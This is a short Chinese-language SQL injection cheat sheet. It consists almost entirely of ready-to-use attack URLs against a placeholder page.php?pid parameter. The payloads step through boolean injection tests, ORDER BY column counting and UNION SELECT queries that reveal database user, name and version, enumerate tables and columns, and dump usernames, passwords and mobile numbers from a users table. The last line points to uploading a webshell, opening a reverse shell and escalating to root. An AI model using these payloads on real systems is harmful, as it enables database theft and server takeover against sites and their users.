概述：

判斷注入點：

http://www./page.php?pid=42 and 1=1 #true

http://www./page.php?pid=42 and 1=2 #false

猜表的列數(shù)

http://www./page.php?pid=42 +ORDER+BY+06 #true

http://www./page.php?pid=42 +ORDER+BY+07 #false

爆出字段

http://www./page.php?pid=-42 +UNION+ALL+SELECT+1,2,3,4,5,6

爆當(dāng)數(shù)據(jù)庫信息

http://www./page.php?pid=-42 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6

猜解表

http://www./page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6

猜解表的字段

http://www./page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f7573657273),3,4,5,6

 獲取字段數(shù)據(jù)

username,pass,mobile

http://www./page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(username,0x23,pass,0x23,mobile+SEPARATOR+0x3c62723e)+FROM+tbl_users),3,4,5,6

完結(jié)，后續(xù)就是找到后臺，嘗試上傳webshell，反彈shell，提權(quán)root一系列的操作了。